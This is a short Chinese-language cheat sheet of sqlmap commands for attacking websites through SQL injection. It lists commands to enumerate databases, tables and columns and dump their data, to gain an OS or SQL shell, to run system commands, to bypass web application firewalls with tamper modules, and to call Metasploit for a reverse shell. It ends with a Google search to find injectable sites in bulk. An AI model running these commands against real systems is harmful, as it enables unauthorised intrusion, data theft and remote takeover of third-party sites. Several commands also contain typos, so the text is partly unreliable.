(GET)
获取数据库:
sqlmap -u ""
获取表:
sqlmap -u "" -D "数据库名" -T "users" --columns
获取子段并打印:
sqlmap - u "" -D "" -T "" -C "A,B" --dump //dump就是打印出来
(POST)
指定文件:
sqlmap -r 1.txt --dbs
获取当前数据库:
sqlmap -r 1.txt --current-db
(获取shell)
sqlmap -r 3.txt ---users --level=3 //users查看权限
获取shell:
sqlmap -r 3.txt --os-shell -level=3
(自动选择y/n)
sqlmap -r 3.txt --os-shell --batch --smart --level=3
(WAF绕过)
sqlmap -r 3.txt --os-shell --batch --smart --level=3 --tamper 模块名
模块的可能根据网站改变而改变,也可以自己写模块
(智能自动注入)
sqlmap -r 3.txt --os-shell --batch --smart -a //将所有的对象都跑出来
直接执行cmd:
sqlmap -r 3.txt --os-cmd="id"
(获取数据shell)
sqlmap -r 3.txt --sql-shell
sqlmap -r 3.txt --os-pwn 调用msf反弹shelll
(自动搜索带注入点的网站)
sqlmap -g "inurl:php?id=1" 用google进行搜索,注意:inurl也可以改成别的